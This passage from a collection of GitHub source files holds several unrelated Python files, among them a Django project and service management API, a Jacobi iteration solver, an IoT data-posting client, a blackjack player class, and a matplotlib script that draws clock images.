scale=\"1e6\" name=\"Mean\" value=\"'+str(mean[0])+'\"'\n\t\tsigma_text = 'parameter scale=\"1e6\" name=\"Sigma\" min=\"0.01\" max=\"100.0\" free=\"1\" value=\"'+sigma+'\"'\n\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"Gaussian\"')\n\t\tspectral.append(norm_text)\n\t\tspectral.append(mean_text)\n\t\tspectral.append(sigma_text)\n\n\telse:\n\t print(\"Wrong Spectral model!!! CHECK MODEL NAME!!!\")\n\t sys.exit()\n\n\treturn spectral\n\t \ndef temporalFun(inTime):\n\t# --------------------\n\t# CREATE TEMPORAL MODEL\n\t# --------------------\n\n\t#get model name (TDB)\n\t#SpatModel = inTime[0] \n\tSpatModel = \"Light\"\n\t\n\tnorm = float(inTime[0])\n\tfitspath = inTime[1]\n\n\t# set text to be put in the xml file\n\n\tnorm_text ='parameter scale=\"'+numdiv(norm)[1]+'\" name=\"Normalization\" min=\"0.0\" max=\"1000.0\" free=\"0\" value=\"'+numdiv(norm)[0]+'\"'\n\n\tif (SpatModel == 'Light'):\n\t\ttemporal = gammalib.GXmlElement('temporal type=\"LightCurve\" file=\"'+fitspath+'\"')\n\t\ttemporal.append(gammalib.GXmlElement(norm_text))\n\telse:\n\t\tprint(\"The only supported temporal model is the one with Normalization and a fits file\")\n\t\tsys.exit()\n\n\treturn temporal\n\n# ================= #\n# Show XML document #\n# ================= #\ndef show_xml(xml):\n\t\"\"\"\n\tShow XML document on the screen.\n\t\"\"\"\n\t# Allocate string URL\n\turl = gammalib.GUrlString()\n\t\n\t# Write XML document in URL\n\txml.write(url)\n\t\n\t# Print URL buffer\n\t#if ver != '': print(url.string())\n\t\n\t# Return\n\treturn\n\n# ======================== #\n# Main routine entry point #\n# ======================== #\nif __name__ == '__main__':\n\n\tnomefile = str(sys.argv[1])\n\t#f = open(nomefile, 'r') \n\n\t# Allocate XML document\n\txml = gammalib.GXml()\n\n\t# main branch \n\tsourcelibrary = xml.append('source_library title=\"source library\"')\n\n\t# if argv has verbose attribute, set verbose on\n\n\tglobal ver\n\n\tif len(sys.argv) == 3: \n\t\tver = 'yes'\n\telse: \n\t\tver = ''\n\n\n\n\n\t# read lines\n\n\twith open(nomefile) as openfile:\n\t\tfor line in openfile:\n\t\t\tinputs = line.split()\n\t\t\tif len(inputs) != 0:\n\t\t\t\tif line[0] != '#':\n\t\t\t\t\tsourcelibrary.append(sourceDef(inputs))\n\tif ver != '': print('--------------------------------')\n\t\n\t#SHOW XML FILE \n\tshow_xml(xml)\n\n\t#print(models)\n\t# Save the XML document into a file\n\tname_fil = sys.argv[1].split('.')\n\n\txml.save(name_fil[0]+'.xml')\n","repo_name":"HESOFTS/sexten_2017","sub_path":"model_creator/scriptModel_variable.py","file_name":"scriptModel_variable.py","file_ext":"py","file_size_in_byte":19533,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"1092841056","text":"from django.http import JsonResponse\nfrom utils import baseview\nfrom assets.models import BusinessServices, BusinessEnvironment, BusinessProject, ServiceToEnv\nfrom assets.serializers import EnvironmentSerializers, ServicesSerializers, ProjectSerializers\nfrom utils.util import now\nfrom audit.apis.audit import PutAudit\nfrom utils.auth import auth\nfrom django.db.models import Count, Q\n\n\ndef spec_str_format(data: list): # [1,2] TO \",1,2,\"\n str_trans = \",\"\n for item in data:\n str_trans += str(item) + \",\"\n return str_trans\n\n\ndef spec_list_format(data: str): # \",1,2,\" TO [1,2]\n trans = [int(item) for item in list(filter(None, data.split(',')))]\n return trans\n\n\ndef service_band_env_machine(machine_ids: list, env_id: int,\n service_id: int): # 服务器绑定环境ID\n machine_ids_str = ''\n if machine_ids:\n machine_ids_str = spec_str_format(machine_ids)\n query_service = ServiceToEnv.objects.filter(env_id=env_id,\n service_id=service_id)\n if not query_service:\n ServiceToEnv.objects.create(env_id=env_id,\n service_id=service_id,\n rel_ips=machine_ids_str,\n c_time=now(),\n u_time=now())\n else:\n query_service.update(rel_ips=machine_ids_str, u_time=now(), del_tag=0)\n\n\nclass EnvironmentListView(baseview.BaseView):\n @auth(\"projects.edit.view\")\n def get(self, request, args=None):\n serializer = EnvironmentSerializers(\n BusinessEnvironment.objects.filter(del_tag=0), many=True)\n msg = {'code': 200, 'data': serializer.data, 'msg': 'success'}\n return JsonResponse(msg)\n\n @auth(\"projects.edit.add\")\n def post(self, request, args=None):\n data = request.data\n name = data['name'].strip() if data.get('name', None) else None\n if not name:\n return JsonResponse({\n \"code\": 10003,\n \"data\": {},\n \"msg\": \"name required.\"\n })\n query_env = BusinessEnvironment.objects.filter(name=name, del_tag=0)\n data.pop(\"id\")\n data[\"c_time\"] = now()\n data[\"u_time\"] = now()\n if not query_env:\n BusinessEnvironment.objects.create(**data)\n msg = {'code': 200, 'data': {}, 'msg': '新增环境成功'}\n else:\n msg = {'code': 10005, 'data': {}, 'msg': '环境名已存在,请勿重复添加'}\n PutAudit(request, msg) # 审计\n return JsonResponse(msg)\n\n @auth(\"projects.edit.edit\")\n def put(self, request, args=None):\n data = request.data\n if \"id\" not in data:\n return JsonResponse({\n \"code\": 10003,\n \"data\": {},\n \"msg\": \"id required.\"\n })\n id = data.get('id')\n data_name = data['name'].strip()\n data['u_time'] = now()\n query_env = BusinessEnvironment.objects.filter(del_tag=0, id=id)\n if query_env:\n query_env_name = BusinessEnvironment.objects.filter(del_tag=0,\n name=data_name)\n env_id = query_env_name[0].id if query_env_name else None\n if not env_id:\n query_env.update(**data)\n msg = {'code': 200, 'data': {}, 'msg': '环境信息修改成功'}\n elif env_id == id:\n query_env.update(**data)\n msg = {'code': 200, 'data': {}, 'msg': '环境信息修改成功'}\n else:\n msg = {'code': 10002, 'data': {}, 'msg': '环境名称已存在,请勿重复添加'}\n else:\n msg = {'code': 10003, 'data': {}, 'msg': '未找到此环境信息'}\n PutAudit(request, msg) # 审计\n return JsonResponse(msg)\n\n @auth(\"projects.edit.del\")\n def delete(self, request, args=None):\n data = request.data\n id = data.get('id', None)\n if not id:\n return JsonResponse({\n \"code\": 10003,\n \"data\": {},\n \"msg\": \"id required.\"\n })\n query_env = BusinessEnvironment.objects.filter(del_tag=0, id=int(id))\n if query_env:\n query_rel = ServiceToEnv.objects.filter(\n del_tag=0, env_id=id).values('service_id')\n query_service = list(\n filter(None, [item['service_id'] for item in query_rel]))\n if query_service:\n msg = {'code': 10004, 'data': {}, 'msg': '此环境已绑项目,请先解绑'}\n else:\n query_env.update(del_tag=1)\n msg = {'code': 200, 'data': {}, 'msg': '环境信息删除成功'}\n else:\n msg = {'code': 10003, 'data': {}, 'msg': '未找到此环境信息,删除失败'}\n PutAudit(request, msg) # 审计\n return JsonResponse(msg)\n\n\nclass ProjectListView(baseview.BaseView):\n @auth(\"projects.edit.view\")\n def get(self, request, args=None):\n q = Q()\n q.children.append((\"del_tag\", 0))\n pageNo = int(request.GET.get('page_no', 1))\n pageSize = int(request.GET.get('page_size', 10))\n query_projects = BusinessProject.objects.filter(q)\n total = query_projects.count()\n start = (pageNo - 1) * pageSize\n end = pageNo * pageSize\n serializer = ProjectSerializers(query_projects[start:end], many=True)\n msg = {\n 'code': 200,\n 'data': {\n 'project_infos': serializer.data,\n 'total': total\n },\n 'msg': 'success'\n }\n return JsonResponse(msg)\n\n @auth(\"projects.edit.add\")\n def post(self, request, args=None):\n data = request.data\n name = data['name'].strip() if data.get('name', None) else None\n if not name:\n return JsonResponse({\n \"code\": 10003,\n \"data\": {},\n \"msg\": \"name required.\"\n })\n if data['manager']:\n data['manager'] = spec_str_format(data['manager'])\n query_proj = BusinessProject.objects.filter(name=name, del_tag=0)\n data.pop(\"id\")\n data[\"c_time\"] = now()\n data[\"u_time\"] = now()\n if not query_proj:\n BusinessProject.objects.create(**data)\n msg = {'code': 200, 'data': {}, 'msg': '新增项目成功'}\n else:\n msg = {'code': 10002, 'data': {}, 'msg': '项目名已存在,请勿重复添加'}\n PutAudit(request, msg) # 审计\n return JsonResponse(msg)\n\n @auth(\"projects.edit.edit\")\n def put(self, request, args=None):\n data = request.data\n id = data.get('id', None)\n name = data.get('name', None)\n if not all([id, name]):\n return JsonResponse({\n \"code\": 10003,\n \"data\": {},\n \"msg\": \"id&name required.\"\n })\n if data['manager']:\n data['manager'] = spec_str_format(data['manager'])\n data[\"u_time\"] = now()\n query_proj = BusinessProject.objects.filter(del_tag=0, id=int(id))\n if query_proj:\n query_proj_id = BusinessProject.objects.filter(name=name.strip(),\n del_tag=0)\n proj_id = query_proj_id[0].id if query_proj_id else None\n if not proj_id:\n query_proj.update(**data)\n msg = {'code': 200, 'data': {}, 'msg': '项目更新成功'}\n elif proj_id == int(id):\n query_proj.update(**data)\n msg = {'code': 200, 'data': {}, 'msg': '项目更新成功'}\n else:\n msg = {'code': 10002, 'data': {}, 'msg': '项目名已存在,请勿重复添加'}\n else:\n msg = {'code': 10002, 'data': {}, 'msg': '未找到相关项目信息'}\n PutAudit(request, msg) # 审计\n return JsonResponse(msg)\n\n @auth(\"projects.edit.del\")\n def delete(self, request, args=None):\n data = request.data\n id = data.get('id', None)\n if not id:\n return JsonResponse({\n \"code\": 10003,\n \"data\": {},\n \"msg\": \"id required.\"\n })\n query_proj = BusinessProject.objects.filter(del_tag=0, id=int(id))\n if query_proj:\n query_service = BusinessServices.objects.filter(\n del_tag=0, rel_project=int(id))\n if not query_service:\n query_proj.update(del_tag=1)\n msg = {'code': 200, 'data': {}, 'msg': '项目删除成功'}\n else:\n msg = {'code': 10004, 'data': {}, 'msg': '此项目已绑定服务,请先解绑'}\n else:\n msg = {'code': 10002, 'data': {}, 'msg': '未找到相关项目信息,删除失败'}\n PutAudit(request, msg) # 审计\n return JsonResponse(msg)\n\n\nclass ServiceListView(baseview.BaseView):\n @auth(\"projects.edit.view\")\n def get(self, request, args=None):\n op_type = request.GET.get('type', None)\n if op_type == \"get_machine_env\":\n srv_id = request.GET.get('id', None)\n if not srv_id:\n msg = {'code': 10003, 'data': {}, 'msg': 'id required'}\n return JsonResponse(msg)\n else:\n srv_id = int(srv_id)\n query_env = ServiceToEnv.objects.filter(\n del_tag=0, service_id=srv_id).values('env_id')\n query_env_ids = list(\n filter(None, [env_id['env_id'] for env_id in query_env]))\n env_to_machine_list = []\n if query_env_ids:\n for env_item in query_env_ids:\n query_machine = ServiceToEnv.objects.filter(\n del_tag=0, service_id=srv_id,\n env_id=env_item).values('rel_ips')\n if query_machine[0]['rel_ips']:\n machine_ids_str = query_machine[0]['rel_ips']\n machine_ids_list = spec_list_format(machine_ids_str)\n env_to_machine_list.append({\n 'env_id':\n env_item,\n 'machine_id':\n machine_ids_list\n })\n msg = {'code': 200, 'data': env_to_machine_list, 'msg': 'success'}\n else:\n q = Q()\n q.children.append((\"del_tag\", 0))\n service_type = request.GET.get('service_type', None)\n project = request.GET.get('project', None)\n if service_type:\n for i in BusinessServices.type_choices:\n if i[1] == service_type:\n service_type = i[0]\n break\n q.children.append((\"service_type\", service_type))\n if project:\n p = BusinessProject.objects.filter(name=project).first()\n q.children.append((\"rel_project\", p.id))\n pageNo = int(request.GET.get('page_no', 1))\n pageSize = int(request.GET.get('page_size', 10))\n query_services = BusinessServices.objects.filter(q)\n total = query_services.count()\n start = (pageNo - 1) * pageSize\n end = pageNo * pageSize\n serializer = ServicesSerializers(query_services[start:end],\n many=True)\n msg = {\n 'code': 200,\n 'data': {\n 'service_infos': serializer.data,\n 'total': total\n },\n 'msg': 'success'\n }\n return JsonResponse(msg)\n\n @auth(\"projects.edit.add\")\n def post(self, request, args=None):\n data = request.data\n name = data.get('name', None)\n env_machines = data.get('env_machines', None)\n data.pop('env_machines')\n data.pop(\"env_id\")\n data.pop(\"rel_machine\")\n rel_project = data.get('rel_project')\n service_type = data.get('service_type')\n # 处理choices映射\n type_choices = BusinessServices.type_choices\n for item in type_choices:\n if item[1] == service_type:\n service_type = item[0]\n break\n if not name:\n return JsonResponse({\n \"code\": 10003,\n \"data\": {},\n \"msg\": \"name required.\"\n })\n if data['manager']:\n data['manager'] = spec_str_format(data['manager'])\n query_service = BusinessServices.objects.filter(\n name=name.strip(),\n del_tag=0,\n rel_project=rel_project,\n service_type=service_type)\n if not query_service:\n data.pop('id')\n data[\"c_time\"] = now()\n data[\"u_time\"] = now()\n data[\"service_type\"] = service_type\n BusinessServices.objects.create(**data)\n srv_id = BusinessServices.objects.filter(name=name.strip(),\n del_tag=0)[0].id\n for i in env_machines:\n env_id = i['env_id']\n if srv_id and env_id:\n service_band_env_machine(service_id=int(srv_id),\n env_id=int(env_id),\n machine_ids=i['machine_id'])\n msg = {'code': 200, 'data': {}, 'msg': '服务新增成功'}\n else:\n msg = {'code': 10002, 'data': {}, 'msg': '服务名已存在,请勿重复添加'}\n PutAudit(request, msg) # 审计\n return JsonResponse(msg)\n\n @auth(\"projects.edit.edit\")\n def put(self, request, args=None):\n data = request.data\n name = data.get('name', None)\n id = data.get('id', None)\n env_machines = data.get('env_machines')\n data.pop('env_machines')\n rel_project = data.get('rel_project', None)\n # 处理choices映射\n service_type = data.get('service_type', None)\n if service_type:\n for i in BusinessServices.type_choices:\n if i[1] == service_type:\n service_type = i[0]\n break\n data['service_type'] = service_type\n if not all([name, id]):\n return JsonResponse({\n \"code\": 10003,\n \"data\": {},\n \"msg\": \"id & name required.\"\n })\n if data['manager']:\n data['manager'] = spec_str_format(data['manager'])\n data[\"u_time\"] = now()\n query_service = BusinessServices.objects.filter(del_tag=0, id=int(id))\n if query_service:\n query_service_id = BusinessServices.objects.filter(\n del_tag=0,\n name=name.strip(),\n rel_project=rel_project,\n service_type=service_type)\n service_id = query_service_id[0].id if query_service_id else None\n if not service_id or service_id == int(id):\n data.pop(\"env_id\")\n data.pop(\"rel_machine\")\n query_service.update(**data)\n # 环境与机器落库\n for item in env_machines:\n env_id = item['env_id']\n if env_id:\n service_band_env_machine(service_id=int(id),\n env_id=int(env_id),\n machine_ids=item[\"machine_id\"])\n msg = {'code': 200, 'data': {}, 'msg': '服务更新成功'}\n else:\n msg = {'code': 10003, 'data': {}, 'msg': '服务名已存在,请勿重复添加'}\n else:\n msg = {'code': 200, 'data': {}, 'msg': '未找到相关项目信息,更新失败'}\n PutAudit(request, msg) # 审计\n return JsonResponse(msg)\n\n @auth(\"projects.edit.del\")\n def delete(self, request, args=None):\n data = request.data\n id = data.get('id', None)\n if not id:\n return JsonResponse({\n \"code\": 10003,\n \"data\": {},\n \"msg\": \"id required.\"\n })\n query_service = BusinessServices.objects.filter(del_tag=0, id=int(id))\n if query_service:\n query_machine = ServiceToEnv.objects.filter(\n del_tag=0, service_id=int(id)).values('rel_ips')\n machine_ids = list(\n filter(None,\n [rel_ips['rel_ips'] for rel_ips in query_machine]))\n if machine_ids:\n msg = {'code': 10004, 'data': {}, 'msg': '此服务已绑定服务器,请先解绑'}\n else:\n query_service.update(del_tag=1)\n ServiceToEnv.objects.filter(del_tag=0,\n service_id=int(id)).update(\n del_tag=1) # 删除服务,删除关系\n msg = {'code': 200, 'data': {}, 'msg': '服务删除成功'}\n else:\n msg = {'code': 10002, 'data': {}, 'msg': '未找到相关服务信息,删除失败'}\n PutAudit(request, msg) # 审计\n return JsonResponse(msg)\n","repo_name":"MX-Steve/backend_main","sub_path":"assets/apis/configuration_centre.py","file_name":"configuration_centre.py","file_ext":"py","file_size_in_byte":17389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15435253866","text":"import numpy as np\n\nMAX_ITERATIONS = 1000\nmessage = \"\"\n\n\ndef user_input():\n n = int(input(\"Enter matrix size: \"))\n print(\"Enter A matrix:\")\n a = np.array([input().strip().split() for _ in range(n)], float)\n print(\"Enter B vector:\")\n b = np.array(input().strip().split(), dtype=float)\n exp = float(input(\"Enter exp:\"))\n return n, a, b, exp\n\n\ndef print_equation_system(n, A, b):\n for i in range(n):\n print(\" + \".join([str(A[i, j]) + \"*x\" + str(j + 1) for j in range(n)]), \"=\", b[i])\n\n\ndef Jacobi(n, A, b, exp):\n global message\n x = np.zeros(n)\n for iteration in range(MAX_ITERATIONS):\n xx = np.zeros(n)\n for i in range(n):\n x1 = A[i, :i]@ x[:i]\n x2 = A[i, i + 1:]@ x[i + 1:]\n xx[i] = (b[i] - x1 - x2) / A[i, i]\n\n if np.allclose(x, xx, atol=exp):\n break\n\n message += \"Iteration \" + str(iteration + 1) + \": \" + str(x) + \"\\n\"\n message += \"Difference: \" + str(x - xx) + \"\\n\\n\"\n\n x = xx\n return x\n\n\ndef demonstration():\n n, A, b, exp = user_input()\n print(\"\\nEquation system:\")\n print_equation_system(n, A, b)\n x = Jacobi(n, A, b, exp)\n print(\"\\nIterations:\")\n print(message)\n print(\"Solution:\")\n print(x)\n\n\nif __name__ == \"__main__\":\n demonstration()\n\n\n\n # A = np.array([[5.4, -6.2, -0.5], [3.4, 2.3, 0.8], [2.4, -1.1, 3.8]])\n #\n # b = np.array([0.52, -0.8, 1.8])\n # 5.4 -6.2 -0.5\n # 3.4 2.3 0.8\n # 2.4 -1.1 3.8\n # 0.52 -0.8 1.8\n\n # 10 1 -1\n # 1 10 -1\n # -1 1 10\n # 11 10 10","repo_name":"sophiashuv/numericalMethods-AMI23","sub_path":"04_Jacobi_method/JacobiMethod.py","file_name":"JacobiMethod.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41027257572","text":"class Ambient:\n def __init__(self, channelId, writeKey, readKey=None, userKey=None, ssl=False, debug=False):\n try:\n import urequests\n self.requests = urequests\n self.micro = True\n except ImportError:\n import requests\n self.requests = requests\n self.micro = False\n import time\n self.time = time\n\n self.channelId = channelId\n self.writeKey = writeKey\n self.readKey = readKey\n self.userKey = userKey\n self.ssl = ssl\n self.debug = debug\n\n if self.debug:\n self.url = 'http://192.168.33.13/api/v2/channels/' + str(channelId)\n else:\n if self.ssl and not self.micro:\n self.url = 'https://ambidata.io/api/v2/channels/' + str(channelId)\n else:\n self.url = 'http://ambidata.io/api/v2/channels/' + str(channelId)\n\n self.lastsend = 0\n\n def send(self, data, timeout = 30.0):\n millis = self.time.time() * 1000.0 if not self.micro else self.time.ticks_ms()\n if self.lastsend != 0 and (millis - self.lastsend ) < 4999:\n if self.micro:\n r = self.requests.Response(None)\n else:\n r = self.requests.Response()\n r.status_code = 403\n return r\n if isinstance(data, list):\n __d = data\n else:\n __d = [data]\n if self.micro:\n r = self.requests.post(self.url + '/dataarray', json = {'writeKey': self.writeKey, 'data': __d}, headers = {'Content-Type' : 'application/json'})\n else:\n r = self.requests.post(self.url + '/dataarray', json = {'writeKey': self.writeKey, 'data': __d}, headers = {}, timeout = timeout)\n millis = self.time.time() * 1000.0 if not self.micro else self.time.ticks_ms()\n self.lastsend = millis\n return r\n\n def read(self, **args):\n url = self.url + '/data'\n __o = []\n if hasattr(self, 'readKey'):\n __o.append('readKey=' + self.readKey)\n if 'date' in args:\n __o.append('date=' + args['date'])\n else:\n if 'start' in args and 'end' in args:\n __o.append('start=' + args['start'])\n __o.append('end=' + args['end'])\n else:\n if 'n' in args:\n __o.append('n=' + str(args['n']))\n if 'skip' in args:\n __o.append('skip=' + str(args['skip']))\n if len(__o) > 0:\n url = url + '?' + '&'.join(__o)\n timeout = 30.0\n if 'timeout' in args:\n timeout = args['timeout']\n if self.micro:\n self.r = self.requests.get(url)\n else:\n self.r = self.requests.get(url, timeout = timeout)\n return list(reversed(self.r.json()))\n\n def getprop(self, **args):\n url = self.url\n if hasattr(self, 'readKey'):\n url = url + '?' + 'readKey=' + self.readKey\n timeout = 30.0\n if 'timeout' in args:\n timeout = args['timeout']\n if self.micro:\n self.r = self.requests.get(url)\n else:\n self.r = self.requests.get(url, timeout = timeout)\n self.prop = self.r.json()\n return self.prop\n\n def putcmnt(self, t, cmnt, timeout = 30.0):\n if self.micro:\n r = self.requests.put(self.url + '/data', json = {'writeKey': self.writeKey, 'created': t, 'cmnt': cmnt}, headers = {'Content-Type' : 'application/json'})\n else:\n r = self.requests.put(self.url + '/data', json = {'writeKey': self.writeKey, 'created': t, 'cmnt': cmnt}, headers = {}, timeout = timeout)\n return r\n\n def sethide(self, t, hide, timeout = 30.0):\n if self.micro:\n r = self.requests.put(self.url + '/data', json = {'writeKey': self.writeKey, 'created': t, 'hide': hide}, headers = {'Content-Type' : 'application/json'})\n else:\n r = self.requests.put(self.url + '/data', json = {'writeKey': self.writeKey, 'created': t, 'hide': hide}, headers = {}, timeout = timeout)\n return r\n","repo_name":"AmbientDataInc/ambient-python-lib","sub_path":"ambient.py","file_name":"ambient.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"61"} +{"seq_id":"22962982086","text":"from src.hand import hand\nfrom src.config import config\nfrom random import randint\n\nclass player:\n strats = [\"basic\", \"standat17\", \"rand\"]\n\n def __init__(self, pos, dealer, comp, strat):\n self.isComp = comp\n if comp:\n self.strat = strat\n if self.strat == \"any\":\n self.strat = self.strats[randint(0, 2)]\n if dealer:\n self.state = \"idle\"\n else:\n self.money = config[\"setup\"][\"start money\"]\n self.state = \"playing\"\n self.pos = pos\n self.hand = hand()\n","repo_name":"connor-isaias-white/blackjack","sub_path":"src/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37188377405","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n\"\"\"\nNeeds 10s of thousands of images: 128x128 is min size, else it gets blurred. dpi = 72\nNow variations possible: 12x60 = 720\nRadius and ring variance: 5 and 2 = 10 + 5 (5 chose 2) + (5 Chose 1); This is 6 chose 2\nPerhaps 3 and 2\nIt's hard to make it equi-probable so map 1 to 6 to configurations.\n#Thickness of each ring could be one of two values: 5 will change to 10; 10 will change to 40 = 50x\n3 Choose 2 = 2*3 = 6x\nTicks width and length could be chaged: 4x\nAdd inner minute tick: 2x\nWidth and length of needle changed: 4x\n\n= 6 x 4 x 2 x 4 = 196\n\nIf I choose 3 out of 5 positions\n\"\"\"\n#import matplotlib.pyplot as plt\nfrom matplotlib import figure\n#import matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.patches import Circle\nimport matplotlib.patches as patches\nimport io\n#from IPython.core.display import display, HTML\n#display(HTML(\"\"))\n#%config Completer.use_jedi = False\n\n\n# In[2]:\n\n\ndef addTick(ax, theta, cX = 45, cY = 45, radius = 40, t_angle = 2,\n width=5, hatch = \" \", color=\"black\"):\n \"\"\"\n This function simply add a tick,\n It does so by calculating two points and adding a line between them.\n t_angel will sweep theta-t_angel and theta + t_angel\n \"\"\"\n #First convert theta to radians.\n t1 = np.pi*(theta - t_angle)/180\n t2 = np.pi*(theta + t_angle)/180\n \n #Now generate Nx2 i.e, 4x2 points for our polygon\n points = np.zeros((4, 2))\n \n for i in range(4):\n if i == 0:\n #inner left point\n r = radius - width\n t = t1\n elif i == 1:\n #inner right\n r = radius - width\n t = t2\n elif i == 2:\n #outer right\n r = radius\n t = t2\n else:\n #outer left\n r = radius\n t = t1\n points[i, 0] = cX + r * np.cos(t)\n points[i, 1] = cY + r * np.sin(t)\n #ax.add_patch(patches.Polygon(points, hatch = hatch)) #, color='black'\n if hatch == \" \":\n ax.add_patch(patches.Polygon(points, color=color))\n else:\n ax.add_patch(patches.Polygon(points, hatch=hatch))\n\n\n# In[3]:\n\n\ndef addNeedle(ax, theta, cX = 45, cY = 45, radius = 35, t_angle = 1,\n hatch=\" \", color=\"black\"):\n \"\"\"\n This will add the needle at the desired theta, and length would be dictated by radius.\n It will add a very soimple square needle.\n It will be 5 times to one side.. so t_angle will be multiplied by 5 in opposite direction.\n \"\"\"\n t_rad = t_angle*np.pi/180\n #Now generate Nx2 i.e, 4x2 points for our polygon\n points = np.zeros((4, 2))\n \n for i in range(4):\n if i == 0:\n #back left point\n r = -radius/5\n t = theta + t_rad*5\n elif i == 1:\n #back right\n r = -radius/5\n t = theta - t_rad*5\n elif i == 2:\n #front right\n r = radius\n t = theta + t_rad\n else:\n #front left\n r = radius\n t = theta - t_rad\n points[i, 0] = cX + r * np.cos(t)\n points[i, 1] = cY + r * np.sin(t)\n if hatch == \" \":\n ax.add_patch(patches.Polygon(points, color=color))\n else:\n ax.add_patch(patches.Polygon(points, hatch=hatch))\n\n\n# In[8]:\n\n\npatterns = [\" \", \"/\" , \"\\\\\" , \"///\", \"////\", \"---\", \"|\" , \"-\" , \"+\" , \"x\", \"o\", \"O\", \".\", \"*\" ]\ndef getClock(h=3, m = 10, simp=True, cX = 90, cY = 90, r1 = 62, r2 = 72, \n lw1 = 3, lw2 = 3,\n tickA = 1, tickW = 4, iTickR = 40,\n hR = 40, hA = 2, mR = 60, mA = 1):\n \"\"\"\n If simp is false then color etc are generated randomly!!!\n \"\"\"\n global patterns\n fig = figure.Figure()\n ax = fig.subplots(1)\n fig_size = 2.5\n dpi = 72\n canv_width = int(fig_size*dpi)\n if r1 is not None and r1 != 0:\n radius = r1\n else:\n radius = r2\n fig.set_size_inches(fig_size, fig_size)\n if simp:\n c_canvas =np.ones((canv_width, canv_width, 3), dtype=float)\n else:\n c_canvas =np.random.random((canv_width, canv_width, 3))*0.1 + 0.3\n kp = int(np.random.random()*3)%3\n ch = [0, 1, 2]\n ch.remove(kp)\n c_canvas[:,:,ch] = 0\n ax.imshow(c_canvas)\n ax.set_aspect('equal')\n circ1 = None\n color = np.random.rand(3)\n if simp:\n if r1 is not None and r1 != 0:\n circ1 = Circle((cX, cY), r1, linewidth = lw1, fill = False,\n color=color)\n color = color*(min(1.0, 0.5 + np.random.rand()/2))\n circ2 = Circle((cX, cY), r2, linewidth = lw2, fill = False,\n color=color)\n else:\n if r1 is not None and r1 != 0:\n rgb = [ (np.random.random()*0.5 + 0.3) for _ in range(3)]\n rgb.append(1)\n circ1 = Circle((cX, cY), r1, linewidth = lw1, color=rgb)\n rgb = [ (np.random.random()*0.5 + 0.3) for _ in range(3)]\n rgb.append(1)\n circ2 = Circle((cX, cY), r2, linewidth = lw2, fill = False, color=rgb)\n if circ1 is not None:\n ax.add_patch(circ1)\n ax.add_patch(circ2)\n \n htachIdx = 0\n color = 0.9*np.random.rand(3)\n if not simp:\n htachIdx = int(np.random.random()*len(patterns))%len(patterns)\n \n for i in range(12):\n addTick(ax, -30*i, cX = cX, cY = cY, t_angle = tickA if simp else (2+((i+2)%3)//2), \n width=tickW, radius = radius, hatch=patterns[htachIdx],\n color = color)\n if iTickR is not None:\n color = 0.9*np.random.rand(3)\n for i in range(60):\n addTick(ax, 6*i, cX = cX, cY = cY, t_angle = 1, \n width=2, radius = iTickR, hatch=patterns[htachIdx],\n color = color)\n \n #Now add a time, assume that h and m will always be in correct range.\n h = h%12 #As we are in 12 hour mode\n hTheta = (h + m/60)/12*2*np.pi -np.pi/2\n mTheta = m/60*2*np.pi -np.pi/2\n color = 0.9*np.random.rand(3)\n addNeedle(ax, mTheta, cX = cX, cY = cY, radius = mR, \n t_angle=mA if simp else 2, \n hatch=patterns[htachIdx], color=color)\n addNeedle(ax, hTheta, cX = cX, cY = cY, radius = hR, \n t_angle=hA if simp else 3.5,\n hatch=patterns[htachIdx], color=color)\n #print(type(ax.images[0]), type(ax), dir(ax.images[0]), type(ax.images[0].make_image), dir(ax))\n \n \n io_buf = io.BytesIO()\n fig.savefig(io_buf, format='raw', dpi=dpi)#DPI)\n io_buf.seek(0)\n img_arr = np.reshape(np.frombuffer(io_buf.getvalue(), dtype=np.uint8),\n #newshape=(int(fig.bbox.bounds[3]), int(fig.bbox.bounds[2]), -1))\n newshape=(int(fig_size*dpi), int(fig_size*dpi), -1))\n io_buf.close()\n #fig.close()\n #print(img_arr.shape)\n #plt.imshow(img_arr)\n #plt.show()\n \n mar = 26#8#0.125*64\n delta = 2\n ad_delta = 0\n #print(\"fig.dpi: \",fig.dpi)\n if fig.dpi != 72:\n ad_delta = 1\n end = int(fig_size*dpi) - mar#64+8 #256//s_down+y_mar\n mar += ad_delta\n end += ad_delta\n ret_img = img_arr[mar:end, mar+delta:end+delta][:,:,:3]\n #del(io_buf)\n #del(img_arr)\n #plt.clf()\n #del(plt)\n #del(ax)\n #plt.close('all')\n #print(\"Closing all\")\n return ret_img\n\n\n# In[9]:\n\n\ndef getCenter(mv_mar, randSeed = None):\n if mv_mar < 0: mv_mar = 0\n if randSeed is None:\n np.random.seed()\n mv_mar = np.random.randint(mv_mar)\n if randSeed is None:\n np.random.seed()\n if mv_mar > 10:\n if np.random.randint(mv_mar) > 5:\n mv_mar = 5\n if randSeed is None:\n np.random.seed()\n if np.random.randint(2) == 0:\n mv_mar = -1\n return 90 + mv_mar\n\n\n# In[10]:\n\n\ndef getRandomClock(simp = True, randSeed = None,\n clkSize=-1, h = -1, m = -1):\n \"\"\"It will simply generate a random clock.\n Howvere its best to set the seed before this function.\n \n if randSeed is given then it is guranteed that if other \n parmas are not varied than same clock would be produced.\n \n clkSize: Take 0, 1, 2 (larger values are clipped)\n This is outer ring which is r2, 0, 1, 2: 42-62-82\n \n r1 is smaller radius\n \n \"\"\"\n org_r_state = None\n if randSeed is not None:\n if randSeed != -1:\n org_r_state = np.random.get_state()\n np.random.seed(randSeed)\n else:\n np.random.seed()\n if clkSize == -1: clkSize = np.random.randint(3)\n if h == -1: h = np.random.randint(12)\n else: np.random.randint(12) #Hack to get random and not random clocks!!\n if randSeed is None:\n np.random.seed()\n if m == -1: m = np.random.randint(60)\n else: np.random.randint(60)\n #print(\"Updated code: h: \",h,\" and m:\",m)\n #First r2 can vary from 82 to 52\n r2 = 80\n if clkSize 